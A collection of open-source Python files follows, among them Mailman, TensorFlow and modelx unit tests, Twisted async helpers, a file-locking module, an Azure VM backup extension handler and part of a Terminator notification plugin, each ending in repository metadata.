call_api('http://localhost:9001/3.0/queues/notaq')
self.assertEqual(cm.exception.code, 404)
def test_no_such_list(self):
# POSTing to a queue with a bad list-id gives a 400.
with self.assertRaises(HTTPError) as cm:
call_api('http://localhost:9001/3.0/queues/bad', {
'list_id': 'nosuchlist.example.com',
'text': TEXT,
})
self.assertEqual(cm.exception.code, 400)
def test_inject(self):
# Injecting a message leaves the message in the queue.
starting_messages = get_queue_messages('bad')
self.assertEqual(len(starting_messages), 0)
content, response = call_api('http://localhost:9001/3.0/queues/bad', {
'list_id': 'test.example.com',
'text': TEXT})
self.assertEqual(response.status, 201)
location = response['location']
filebase = location.split('/')[-1]
# The message is in the 'bad' queue.
content, response = call_api('http://localhost:9001/3.0/queues/bad')
files = content['files']
self.assertEqual(len(files), 1)
self.assertEqual(files[0], filebase)
# Verify the files directly.
files = list(config.switchboards['bad'].files)
self.assertEqual(len(files), 1)
self.assertEqual(files[0], filebase)
# Verify the content.
items = get_queue_messages('bad')
self.assertEqual(len(items), 1)
msg = items[0].msg
# Remove some headers that get added by Mailman.
del msg['date']
self.assertEqual(msg['x-message-id-hash'],
'MS6QLWERIJLGCRF44J7USBFDELMNT2BW')
del msg['x-message-id-hash']
self.assertMultiLineEqual(msg.as_string(), TEXT)
def test_delete_file(self):
# Inject a file, then delete it.
content, response = call_api('http://localhost:9001/3.0/queues/bad', {
'list_id': 'test.example.com',
'text': TEXT})
location = response['location']
self.assertEqual(len(config.switchboards['bad'].files), 1)
# Delete the file through REST.
content, response = call_api(location, method='DELETE')
self.assertEqual(response.status, 204)
self.assertEqual(len(config.switchboards['bad'].files), 0)
| khushboo9293/mailman3 | src/mailman/rest/tests/test_queues.py | Python | gpl-2.0 | 3,843 |
#!/usr/bin/python2
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests of directory storage adapter."""
import os
import unittest
import directory_storage
import fake_storage
import gsd_storage
import hashing_tools
import hashing_tools_test
import working_directory
class TestDirectoryStorage(unittest.TestCase):
def setUp(self):
storage = fake_storage.FakeStorage()
self._dir_storage = directory_storage.DirectoryStorageAdapter(storage)
def test_WriteRead(self):
# Check that a directory can be written and then read back.
with working_directory.TemporaryWorkingDirectory() as work_dir:
temp1 = os.path.join(work_dir, 'temp1')
temp2 = os.path.join(work_dir, 'temp2')
hashing_tools_test.GenerateTestTree('write_read', temp1)
self._dir_storage.PutDirectory(temp1, 'foo')
self._dir_storage.GetDirectory('foo', temp2)
self.assertEqual(hashing_tools.StableHashPath(temp1),
hashing_tools.StableHashPath(temp2))
def test_InputUntouched(self):
# Check that PutDirectory doesn't alter its inputs.
with working_directory.TemporaryWorkingDirectory() as work_dir:
temp1 = os.path.join(work_dir, 'temp1')
hashing_tools_test.GenerateTestTree('input_untouched', temp1)
h1 = hashing_tools.StableHashPath(temp1)
self._dir_storage.PutDirectory(temp1, 'hello')
h2 = hashing_tools.StableHashPath(temp1)
self.assertEqual(h1, h2)
def test_URLsPropagate(self):
# Check that consistent non-None URLs come from get and put.
with working_directory.TemporaryWorkingDirectory() as work_dir:
temp1 = os.path.join(work_dir, 'temp1')
temp2 = os.path.join(work_dir, 'temp2')
hashing_tools_test.GenerateTestTree('url_propagate', temp1)
url1 = self._dir_storage.PutDirectory(temp1, 'me')
url2 = self._dir_storage.GetDirectory('me', temp2)
self.assertEqual(url1, url2)
self.assertNotEqual(None, url1)
def test_BadWrite(self):
def call(cmd):
return 1
storage = gsd_storage.GSDStorage(
gsutil=['mygsutil'],
write_bucket='mybucket',
read_buckets=[],
call=call)
dir_storage = directory_storage.DirectoryStorageAdapter(storage)
# Check that storage exceptions come thru on failure.
with working_directory.TemporaryWorkingDirectory() as work_dir:
temp1 = os.path.join(work_dir, 'temp1')
hashing_tools_test.GenerateTestTree('bad_write', temp1)
self.assertRaises(gsd_storage.GSDStorageError,
dir_storage.PutDirectory, temp1, 'bad')
def test_BadRead(self):
# Check that storage exceptions come thru on failure.
with working_directory.TemporaryWorkingDirectory() as work_dir:
temp1 = os.path.join(work_dir, 'temp1')
self.assertEqual(None, self._dir_storage.GetDirectory('foo', temp1))
if __name__ == '__main__':
unittest.main()
| Lind-Project/native_client | build/directory_storage_test.py | Python | bsd-3-clause | 3,028 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for pandas_io."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
# TODO: #6568 Remove this hack that makes dlopen() not crash.
if hasattr(sys, 'getdlopenflags') and hasattr(sys, 'setdlopenflags'):
import ctypes
sys.setdlopenflags(sys.getdlopenflags() | ctypes.RTLD_GLOBAL)
import numpy as np
from tensorflow.contrib.learn.python.learn.learn_io import pandas_io
from tensorflow.python.framework import errors
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
from tensorflow.python.training import queue_runner_impl
# pylint: disable=g-import-not-at-top
try:
import pandas as pd
HAS_PANDAS = True
except ImportError:
HAS_PANDAS = False
class PandasIoTest(test.TestCase):
def makeTestDataFrame(self):
index = np.arange(100, 104)
a = np.arange(4)
b = np.arange(32, 36)
x = pd.DataFrame({'a': a, 'b': b}, index=index)
y = pd.Series(np.arange(-32, -28), index=index)
return x, y
def callInputFnOnce(self, input_fn, session):
results = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
result_values = session.run(results)
coord.request_stop()
coord.join(threads)
return result_values
def testPandasInputFn_IndexMismatch(self):
if not HAS_PANDAS:
return
x, _ = self.makeTestDataFrame()
y_noindex = pd.Series(np.arange(-32, -28))
with self.assertRaises(ValueError):
pandas_io.pandas_input_fn(
x, y_noindex, batch_size=2, shuffle=False, num_epochs=1)
def testPandasInputFn_ProducesExpectedOutputs(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, y = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, target = self.callInputFnOnce(input_fn, session)
self.assertAllEqual(features['a'], [0, 1])
self.assertAllEqual(features['b'], [32, 33])
self.assertAllEqual(target, [-32, -31])
def testPandasInputFn_OnlyX(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, _ = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y=None, batch_size=2, shuffle=False, num_epochs=1)
features = self.callInputFnOnce(input_fn, session)
self.assertAllEqual(features['a'], [0, 1])
self.assertAllEqual(features['b'], [32, 33])
def testPandasInputFn_ExcludesIndex(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, y = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)
features, _ = self.callInputFnOnce(input_fn, session)
self.assertFalse('index' in features)
def assertInputsCallableNTimes(self, input_fn, session, n):
inputs = input_fn()
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(session, coord=coord)
for _ in range(n):
session.run(inputs)
with self.assertRaises(errors.OutOfRangeError):
session.run(inputs)
coord.request_stop()
coord.join(threads)
def testPandasInputFn_RespectsEpoch_NoShuffle(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, y = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=4, shuffle=False, num_epochs=1)
self.assertInputsCallableNTimes(input_fn, session, 1)
def testPandasInputFn_RespectsEpoch_WithShuffle(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, y = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=4, shuffle=True, num_epochs=1)
self.assertInputsCallableNTimes(input_fn, session, 1)
def testPandasInputFn_RespectsEpoch_WithShuffleAutosize(self):
if not HAS_PANDAS:
return
with self.test_session() as session:
x, y = self.makeTestDataFrame()
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=2, shuffle=True, queue_capacity=None, num_epochs=2)
self.assertInputsCallableNTimes(input_fn, session, 4)
def testPandasInputFn_RespectsEpochUnevenBatches(self):
if not HAS_PANDAS:
return
x, y = self.makeTestDataFrame()
with self.test_session() as session:
input_fn = pandas_io.pandas_input_fn(
x, y, batch_size=3, shuffle=False, num_epochs=1)
# Before the last batch, only one element of the epoch should remain.
self.assertInputsCallableNTimes(input_fn, session, 2)
def testPandasInputFn_Idempotent(self):
if not HAS_PANDAS:
return
x, y = self.makeTestDataFrame()
for _ in range(2):
pandas_io.pandas_input_fn(
x, y, batch_size=2, shuffle=False, num_epochs=1)()
for _ in range(2):
pandas_io.pandas_input_fn(
x, y, batch_size=2, shuffle=True, num_epochs=1)()
if __name__ == '__main__':
test.main()
| AsimmHirani/ISpyPi | tensorflow/contrib/tensorflow-master/tensorflow/contrib/learn/python/learn/learn_io/pandas_io_test.py | Python | apache-2.0 | 5,832 |
import modelx as mx
import pytest
@pytest.fixture
def duplicate_inheritance_model():
"""
Sub <------------------- Base1
| |
Child <--------- Base2 Child
| | |
GChild <--Base3 GChild GChild
| | |
foo foo foo
"""
m = mx.new_model()
m.new_space("Sub").new_space("Child").new_space("GChild")
m.new_space("Base1").new_space("Child").new_space("GChild").new_cells(
"foo", formula=lambda: "Under Base1")
m.new_space("Base2").new_space("GChild").new_cells(
"foo", formula=lambda: "Under Base2")
m.new_space("Base3").new_cells(
"foo", formula=lambda: "Under Base3")
return m
def test_nearest_first(duplicate_inheritance_model):
m = duplicate_inheritance_model
m.Sub.add_bases(m.Base1)
m.Sub.Child.add_bases(m.Base2)
m.Sub.Child.GChild.add_bases(m.Base3)
assert "Under Base3" == m.Sub.Child.GChild.foo()
def test_farthest_first(duplicate_inheritance_model):
m = duplicate_inheritance_model
m.Sub.Child.GChild.add_bases(m.Base3)
m.Sub.Child.add_bases(m.Base2)
m.Sub.add_bases(m.Base1)
assert "Under Base3" == m.Sub.Child.GChild.foo()
| fumitoh/modelx | modelx/tests/core/space/inheritance/test_add_bases.py | Python | gpl-3.0 | 1,269 |
# -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
"""Twisted utility functions"""
from __future__ import (
absolute_import, division, print_function, with_statement,
unicode_literals)
import itertools as it
from os import environ
from sys import executable
from functools import partial
from twisted.internet import defer
from twisted.internet.defer import (
inlineCallbacks, maybeDeferred, gatherResults, returnValue)
from twisted.internet.task import coiterate, cooperate
from twisted.internet.utils import getProcessOutput
from pipe2py.lib import utils
WORKERS = 50
asyncNone = defer.succeed(None)
asyncReturn = partial(defer.succeed)
def _get_work(asyncCallable, callback, map_func, *iterables):
func = lambda *args: asyncCallable(*args).addCallback(callback)
return map_func(func, *iterables)
def _parallel(work, asyncCallable):
deferreds = it.repeat(coiterate(work), WORKERS)
return gatherResults(deferreds, consumeErrors=True)
# helper functions
def coop(asyncCallable, callback, *iterables):
work = _get_work(asyncCallable, callback, it.imap, *iterables)
return coiterate(work)
def asyncParallel(asyncCallable, callback, *iterables):
work = _get_work(asyncCallable, callback, it.imap, *iterables)
return _parallel(work, asyncCallable)
def coopStar(asyncCallable, callback, iterable):
work = _get_work(asyncCallable, callback, it.starmap, *[iterable])
return coiterate(work)
def asyncStarParallel(asyncCallable, callback, iterable):
work = _get_work(asyncCallable, callback, it.starmap, *[iterable])
return _parallel(work, asyncCallable)
# End user functions
def deferToProcess(source, function, *args, **kwargs):
command = "from %s import %s\n%s(*%s, **%s)" % (
source, function, function, args, kwargs)
return getProcessOutput(executable, ['-c', command], environ)
def trueDeferreds(sources, filter_func=None):
return it.imap(partial(maybeDeferred, it.ifilter, filter_func), sources)
@inlineCallbacks
def coopReduce(func, iterable, initializer=None):
it = iter(iterable)
x = initializer or next(it)
def cooperator(func, it, x):
for y in it:
x = func(x, y)
yield
returnValue(x)
task = cooperate(cooperator(func, it, x))
result = yield task.whenDone()
returnValue(result)
def asyncReduce(asyncCallable, iterable, initializer=None):
it = iter(iterable)
x = initializer or next(it)
@inlineCallbacks
def work(asyncCallable, it, x):
for y in it:
x = yield asyncCallable(x, y)
returnValue(x)
return work(asyncCallable, it, x)
@inlineCallbacks
def asyncCmap(asyncCallable, *iterables):
"""itertools.imap for deferred callables using cooperative multitasking
"""
results = []
yield coop(asyncCallable, results.append, *iterables)
returnValue(results)
@inlineCallbacks
def asyncPmap(asyncCallable, *iterables):
"""itertools.imap for deferred callables using parallel cooperative
multitasking
"""
results = []
yield asyncParallel(asyncCallable, results.append, *iterables)
returnValue(results)
def asyncImap(asyncCallable, *iterables):
"""itertools.imap for deferred callables
"""
deferreds = it.imap(asyncCallable, *iterables)
return gatherResults(deferreds, consumeErrors=True)
@inlineCallbacks
def asyncStarCmap(asyncCallable, iterable):
"""itertools.starmap for deferred callables using cooperative multitasking
"""
results = []
yield coopStar(asyncCallable, results.append, iterable)
returnValue(results)
@inlineCallbacks
def asyncStarPmap(asyncCallable, iterable):
"""itertools.starmap for deferred callables using parallel cooperative
multitasking
"""
results = []
yield asyncStarParallel(asyncCallable, results.append, iterable)
returnValue(results)
def asyncStarMap(asyncCallable, iterable):
"""itertools.starmap for deferred callables
"""
deferreds = it.starmap(asyncCallable, iterable)
return gatherResults(deferreds, consumeErrors=True)
# Internal functions
_apply_func = partial(utils._apply_func, map_func=asyncStarMap)
_map_func = asyncImap
def asyncBroadcast(_INPUT, *asyncCallables):
"""copies a source and delivers the items to multiple functions
_INPUT = it.repeat({'title': 'foo'}, 3)
/--> foo2bar(_INPUT) --> _OUTPUT1 == it.repeat('bar', 3)
/
_INPUT ---> foo2baz(_INPUT) --> _OUTPUT2 == it.repeat('baz', 3)
\
\--> foo2qux(_INPUT) --> _OUTPUT3 == it.repeat('quz', 3)
The way you would construct such a flow in code would be::
succeed = twisted.internet.defer.succeed
foo2bar = lambda item: succeed(item['title'].replace('foo', 'bar'))
foo2baz = lambda item: succeed(item['title'].replace('foo', 'baz'))
foo2qux = lambda item: succeed(item['title'].replace('foo', 'quz'))
asyncBroadcast(_INPUT, foo2bar, foo2baz, foo2qux)
"""
kwargs = {'map_func': _map_func, 'apply_func': _apply_func}
return utils.broadcast(_INPUT, *asyncCallables, **kwargs)
def asyncDispatch(splits, *asyncCallables):
"""takes multiple sources (returned by asyncDispatch or asyncBroadcast)
and delivers the items to multiple functions
_INPUT1 = it.repeat('bar', 3)
_INPUT2 = it.repeat('baz', 3)
_INPUT3 = it.repeat('qux', 3)
_INPUT1 --> double(_INPUT) --> _OUTPUT1 == it.repeat('barbar', 3)
_INPUT2 --> triple(_INPUT) --> _OUTPUT2 == it.repeat('bazbazbaz', 3)
_INPUT3 --> quadruple(_INPUT) --> _OUTPUT3 == it.repeat('quxquxquxqux', 3)
The way you would construct such a flow in code would be::
succeed = twisted.internet.defer.succeed
_INPUT = it.repeat({'title': 'foo'}, 3)
splits = asyncBroadcast(_INPUT, foo2bar, foo2baz, foo2qux)
double = lambda item: succeed(item * 2)
triple = lambda item: succeed(item * 3)
quadruple = lambda item: succeed(item * 4)
asyncBroadcast(splits, double, triple, quadruple)
"""
kwargs = {'map_func': _map_func, 'apply_func': _apply_func}
return utils.dispatch(splits, *asyncCallables, **kwargs)
| kazeeki/pipe2py | pipe2py/twisted/utils.py | Python | gpl-2.0 | 6,204 |
# portalocker.py - Cross-platform (posix/nt) API for flock-style file locking.
# Requires python 1.5.2 or better.
#
# sostler May 2008
# Taken from: http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/65203
"""Cross-platform (posix/nt) API for flock-style file locking.
Synopsis:
import portalocker
file = open("somefile", "r+")
portalocker.lock(file, portalocker.LOCK_EX)
file.seek(12)
file.write("foo")
file.close()
If you know what you're doing, you may choose to
portalocker.unlock(file)
before closing the file, but why?
Methods:
lock( file, flags )
unlock( file )
Constants:
LOCK_EX
LOCK_SH
LOCK_NB
Exceptions:
LockException
Notes:
For the 'nt' platform, this module requires the Python Extensions for Windows.
Be aware that this may not work as expected on Windows 95/98/ME.
History:
I learned the win32 technique for locking files from sample code
provided by John Nielsen <[email protected]> in the documentation
that accompanies the win32 modules.
Author: Jonathan Feinberg <[email protected]>,
Lowell Alleman <[email protected]>
Version: $Id: portalocker.py 5474 2008-05-16 20:53:50Z lowell $
"""
__all__ = [
"lock",
"unlock",
"LOCK_EX",
"LOCK_SH",
"LOCK_NB",
"LockException",
]
import os
class LockException(Exception):
# Error codes:
LOCK_FAILED = 1
if os.name == 'nt':
import win32con
import win32file
import pywintypes
LOCK_EX = win32con.LOCKFILE_EXCLUSIVE_LOCK
LOCK_SH = 0 # the default
LOCK_NB = win32con.LOCKFILE_FAIL_IMMEDIATELY
# is there any reason not to reuse the following structure?
__overlapped = pywintypes.OVERLAPPED()
elif os.name == 'posix':
import fcntl
LOCK_EX = fcntl.LOCK_EX
LOCK_SH = fcntl.LOCK_SH
LOCK_NB = fcntl.LOCK_NB
else:
raise RuntimeError, "PortaLocker only defined for nt and posix platforms"
if os.name == 'nt':
def lock(file, flags):
hfile = win32file._get_osfhandle(file.fileno())
try:
win32file.LockFileEx(hfile, flags, 0, -0x10000, __overlapped)
except pywintypes.error, exc_value:
# error: (33, 'LockFileEx', 'The process cannot access the file because another process has locked a portion of the file.')
if exc_value[0] == 33:
raise LockException(LockException.LOCK_FAILED, exc_value[2])
else:
# Q: Are there exceptions/codes we should be dealing with here?
raise
def unlock(file):
hfile = win32file._get_osfhandle(file.fileno())
try:
win32file.UnlockFileEx(hfile, 0, -0x10000, __overlapped)
except pywintypes.error, exc_value:
if exc_value[0] == 158:
# error: (158, 'UnlockFileEx', 'The segment is already unlocked.')
# To match the 'posix' implementation, silently ignore this error
pass
else:
# Q: Are there exceptions/codes we should be dealing with here?
raise
elif os.name == 'posix':
def lock(file, flags):
try:
fcntl.flock(file.fileno(), flags)
except IOError, exc_value:
# IOError: [Errno 11] Resource temporarily unavailable
if exc_value[0] == 11:
raise LockException(LockException.LOCK_FAILED, exc_value[1])
else:
raise
def unlock(file):
fcntl.flock(file.fileno(), fcntl.LOCK_UN)
if __name__ == '__main__':
from time import time, strftime, localtime
import sys
import portalocker
log = open('log.txt', "a+")
portalocker.lock(log, portalocker.LOCK_EX)
timestamp = strftime("%m/%d/%Y %H:%M:%S\n", localtime(time()))
log.write( timestamp )
print "Wrote lines. Hit enter to release lock."
dummy = sys.stdin.readline()
log.close() | zepheira/exhibit | src/webapp/api/extensions/curate/files/admin/portalocker.py | Python | bsd-3-clause | 3,905 |
#!/usr/bin/env python
#
# VM Backup extension
#
# Copyright 2014 Microsoft Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Requires Python 2.7+
#
import array
import base64
import os
import os.path
import re
import json
import string
import subprocess
import sys
import imp
import time
import shlex
import traceback
import httplib
import xml.parsers.expat
import datetime
from os.path import join
from mounts import Mounts
from mounts import Mount
from patch import *
from fsfreezer import FsFreezer
from common import CommonVariables
from parameterparser import ParameterParser
from Utils import HandlerUtil
from urlparse import urlparse
from snapshotter import Snapshotter
from backuplogger import Backuplogger
from blobwriter import BlobWriter
from taskidentity import TaskIdentity
from MachineIdentity import MachineIdentity
#Main function is the only entrence to this extension handler
def main():
global MyPatching,backup_logger,hutil
HandlerUtil.LoggerInit('/var/log/waagent.log','/dev/stdout')
HandlerUtil.waagent.Log("%s started to handle." % (CommonVariables.extension_name))
hutil = HandlerUtil.HandlerUtility(HandlerUtil.waagent.Log, HandlerUtil.waagent.Error, CommonVariables.extension_name)
backup_logger = Backuplogger(hutil)
MyPatching = GetMyPatching(logger = backup_logger)
for a in sys.argv[1:]:
if re.match("^([-/]*)(disable)", a):
disable()
elif re.match("^([-/]*)(uninstall)", a):
uninstall()
elif re.match("^([-/]*)(install)", a):
install()
elif re.match("^([-/]*)(enable)", a):
enable()
elif re.match("^([-/]*)(update)", a):
update()
def install():
hutil.do_parse_context('Install')
hutil.do_exit(0, 'Install','success','0', 'Install Succeeded')
def timedelta_total_seconds(delta):
if not hasattr(datetime.timedelta, 'total_seconds'):
return delta.days * 86400 + delta.seconds
else:
return delta.total_seconds()
def do_backup_status_report(operation, status, status_code, message, taskId, commandStartTimeUTCTicks, blobUri):
backup_logger.log("{0},{1},{2},{3}".format(operation, status, status_code, message))
time_delta = datetime.datetime.utcnow() - datetime.datetime(1970, 1, 1)
time_span = timedelta_total_seconds(time_delta) * 1000
date_string = r'\/Date(' + str((int)(time_span)) + r')\/'
date_place_holder = 'e2794170-c93d-4178-a8da-9bc7fd91ecc0'
stat = [{
"version" : hutil._context._version,
"timestampUTC" : date_place_holder,
"status" : {
"name" : hutil._context._name,
"operation" : operation,
"status" : status,
"code" : status_code,
"taskId":taskId,
"commandStartTimeUTCTicks":commandStartTimeUTCTicks,
"formattedMessage" : {
"lang" : "en-US",
"message" : message
}
}
}]
status_report_msg = json.dumps(stat)
status_report_msg = status_report_msg.replace(date_place_holder,date_string)
blobWriter = BlobWriter(hutil)
blobWriter.WriteBlob(status_report_msg,blobUri)
def exit_with_commit_log(error_msg, para_parser):
backup_logger.log(error_msg, True, 'Error')
if(para_parser is not None and para_parser.logsBlobUri is not None):
backup_logger.commit(para_parser.logsBlobUri)
sys.exit(0)
def convert_time(utcTicks):
return datetime.datetime(1, 1, 1) + datetime.timedelta(microseconds = utcTicks / 10)
def enable():
#this is using the most recent file timestamp.
hutil.do_parse_context('Enable')
freezer = FsFreezer(patching= MyPatching, logger = backup_logger)
unfreeze_result = None
snapshot_result = None
freeze_result = None
global_error_result = None
para_parser = None
run_result = 1
error_msg = ''
run_status = None
# precheck
freeze_called = False
try:
# we need to freeze the file system first
backup_logger.log('starting to enable', True)
# handle the restoring scenario.
mi = MachineIdentity()
stored_identity = mi.stored_identity()
if(stored_identity is None):
mi.save_identity()
else:
current_identity = mi.current_identity()
if(current_identity != stored_identity):
current_seq_no = -1
backup_logger.log("machine identity not same, set current_seq_no to " + str(current_seq_no) + " " + str(stored_identity) + " " + str(current_identity), True)
hutil.set_inused_config_seq(current_seq_no)
mi.save_identity()
hutil.save_seq()
"""
protectedSettings is the privateConfig passed from Powershell.
WATCHOUT that, the _context_config are using the most freshest timestamp.
if the time sync is alive, this should be right.
"""
protected_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('protectedSettings')
public_settings = hutil._context._config['runtimeSettings'][0]['handlerSettings'].get('publicSettings')
para_parser = ParameterParser(protected_settings, public_settings)
if(para_parser.commandStartTimeUTCTicks is not None and para_parser.commandStartTimeUTCTicks != ""):
utcTicksLong = long(para_parser.commandStartTimeUTCTicks)
commandStartTime = convert_time(utcTicksLong)
utcNow = datetime.datetime.utcnow()
backup_logger.log('command start time is ' + str(commandStartTime) + " and utcNow is " + str(utcNow))
timespan = utcNow - commandStartTime
THIRTY_MINUTES = 30 * 60 # in seconds
# handle the machine identity for the restoration scenario.
total_span_in_seconds = timespan.days * 24 * 60 * 60 + timespan.seconds
backup_logger.log('timespan is ' + str(timespan) + ' ' + str(total_span_in_seconds))
if(abs(total_span_in_seconds) > THIRTY_MINUTES):
error_msg = 'the call time stamp is out of date. so skip it.'
exit_with_commit_log(error_msg, para_parser)
if(para_parser.taskId is not None and para_parser.taskId != ""):
taskIdentity = TaskIdentity()
taskIdentity.save_identity(para_parser.taskId)
commandToExecute = para_parser.commandToExecute
#validate all the required parameter here
if(commandToExecute.lower() == CommonVariables.iaas_install_command):
backup_logger.log('install succeed.',True)
run_status = 'success'
error_msg = 'Install Succeeded'
run_result = CommonVariables.success
backup_logger.log(error_msg)
elif(commandToExecute.lower() == CommonVariables.iaas_vmbackup_command):
if(para_parser.backup_metadata is None or para_parser.public_config_obj is None or para_parser.private_config_obj is None):
run_result = CommonVariables.error_parameter
run_status = 'error'
error_msg = 'required field empty or not correct'
backup_logger.log(error_msg, False, 'Error')
else:
backup_logger.log('commandToExecute is ' + commandToExecute, True)
"""
make sure the log is not doing when the file system is freezed.
"""
backup_logger.log('doing freeze now...', True)
freeze_called = True
freeze_result = freezer.freezeall()
backup_logger.log('freeze result ' + str(freeze_result))
# check whether we freeze succeed first?
if(freeze_result is not None and len(freeze_result.errors) > 0):
run_result = CommonVariables.error
run_status = 'error'
error_msg = 'Enable failed with error: ' + str(freeze_result)
backup_logger.log(error_msg, False, 'Warning')
else:
backup_logger.log('doing snapshot now...')
snap_shotter = Snapshotter(backup_logger)
snapshot_result = snap_shotter.snapshotall(para_parser)
backup_logger.log('snapshotall ends...')
if(snapshot_result is not None and len(snapshot_result.errors) > 0):
error_msg = 'snapshot result: ' + str(snapshot_result)
run_result = CommonVariables.error
run_status = 'error'
backup_logger.log(error_msg, False, 'Error')
else:
run_result = CommonVariables.success
run_status = 'success'
error_msg = 'Enable Succeeded'
backup_logger.log(error_msg)
else:
run_status = 'error'
run_result = CommonVariables.error_parameter
error_msg = 'command is not correct'
backup_logger.log(error_msg, False, 'Error')
except Exception as e:
errMsg = 'Failed to enable the extension with error: %s, stack trace: %s' % (str(e), traceback.format_exc())
backup_logger.log(errMsg, False, 'Error')
global_error_result = e
finally:
backup_logger.log('doing unfreeze now...')
if(freeze_called):
unfreeze_result = freezer.unfreezeall()
backup_logger.log('unfreeze result ' + str(unfreeze_result))
if(unfreeze_result is not None and len(unfreeze_result.errors) > 0):
error_msg += ('Enable Succeeded with error: ' + str(unfreeze_result.errors))
backup_logger.log(error_msg, False, 'Warning')
backup_logger.log('unfreeze ends...')
if(para_parser is not None and para_parser.logsBlobUri is not None):
backup_logger.commit(para_parser.logsBlobUri)
else:
backup_logger.log("the logs blob uri is not there, so do not upload log.");
backup_logger.commit_to_local()
"""
we do the final report here to get rid of the complex logic to handle the logging when file system be freezed issue.
"""
if(global_error_result is not None):
if(hasattr(global_error_result,'errno') and global_error_result.errno == 2):
run_result = CommonVariables.error_12
elif(para_parser is None):
run_result = CommonVariables.error_parameter
else:
run_result = CommonVariables.error
run_status = 'error'
error_msg += ('Enable failed.' + str(global_error_result))
if(para_parser is not None and para_parser.statusBlobUri is not None):
do_backup_status_report(operation='Enable',status = run_status,\
status_code=str(run_result), \
message=error_msg,\
taskId=para_parser.taskId,\
commandStartTimeUTCTicks=para_parser.commandStartTimeUTCTicks,\
blobUri=para_parser.statusBlobUri)
hutil.do_exit(0, 'Enable', run_status, str(run_result), error_msg)
def uninstall():
hutil.do_parse_context('Uninstall')
hutil.do_exit(0,'Uninstall','success','0', 'Uninstall succeeded')
def disable():
hutil.do_parse_context('Disable')
hutil.do_exit(0,'Disable','success','0', 'Disable Succeeded')
def update():
hutil.do_parse_context('Upadate')
hutil.do_exit(0,'Update','success','0', 'Update Succeeded')
if __name__ == '__main__' :
main()
| v-zhongz/azure-linux-extensions | VMBackup/main/handle.py | Python | apache-2.0 | 12,248 |
#!/usr/bin/python
# Terminator by Chris Jones <[email protected]>
# GPL v2 only
"""activitywatch.py - Terminator Plugin to watch a terminal for activity"""
import time
import gtk
import gobject
import terminatorlib.plugin as plugin
from terminatorlib.translation import _
from terminatorlib.util import err, dbg
from terminatorlib.version import APP_NAME
try:
import pynotify
# Every plugin you want Terminator to load *must* be listed in 'AVAILABLE'
# This is inside this try so we only make the plugin available if pynotify
# is present on this computer.
AVAILABLE = ['ActivityWatch', 'InactivityWatch']
except ImportError:
err(_('ActivityWatch plugin unavailable: please install python-notify'))
class ActivityWatch(plugin.MenuItem):
"""Add custom commands to the terminal menu"""
capabilities = ['terminal_menu']
watches = None
last_notifies = None
timers = None
def __init__(self):
plugin.MenuItem.__init__(self)
if not self.watches:
self.watches = {}
if not self.last_notifies:
self.last_notifies = {}
if not self.timers:
self.timers = {}
pynotify.init(APP_NAME.capitalize())
def callback(self, menuitems, menu, terminal):
"""Add our menu items to the menu"""
if not self.watches.has_key(terminal):
item = gtk.MenuItem(_('Watch for activity'))
item.connect("activate", self.watch, terminal)
else:
item = gtk.MenuItem(_('Stop watching for activity'))
item.connect("activate", self.unwatch, terminal)
menuitems.append(item)
def watch(self, _widget, terminal):
"""Watch a terminal"""
vte = terminal.get_vte()
self.watches[terminal] = vte.connect('contents-changed',
self.notify, terminal)
def unwatch(self, _widget, terminal):
"""Stop watching a terminal"""
vte = terminal.get_vte()
vte.disconnect(self.watches[terminal])
del(self.watches[terminal])
def notify(self, _vte, terminal):
"""Notify that a terminal did something"""
show_notify = False
# Don't notify if the user is already looking at this terminal.
if terminal.vte.flags() & gtk.HAS_FOCUS:
return True
note = pynotify.Notification('Terminator', 'Activity in: %s' %
terminal.get_window_title(), 'terminator')
this_time = time.mktime(time.gmtime())
if not self.last_notifies.has_key(terminal):
show_notify = True
else:
last_time = self.last_notifies[terminal]
if this_time - last_time > 10:
show_notify = True
if show_notify == True:
note.show()
self.last_notifies[terminal] = this_time
return True
class InactivityWatch(plugin.MenuItem):
"""Add custom commands to notify when a terminal goes inactive"""
capabilities = ['terminal_menu']
watches = None
last_activities = None
timers = None
def __init__(self):
plugin.MenuItem.__init__(self)
if not self.watches:
self.watches = {}
if not self.last_activities:
self.last_activities = {}
if not self.timers:
self.timers = {}
pynotify.init(APP_NAME.capitalize())
def callback(self, menuitems, menu, terminal):
"""Add our menu items to the menu"""
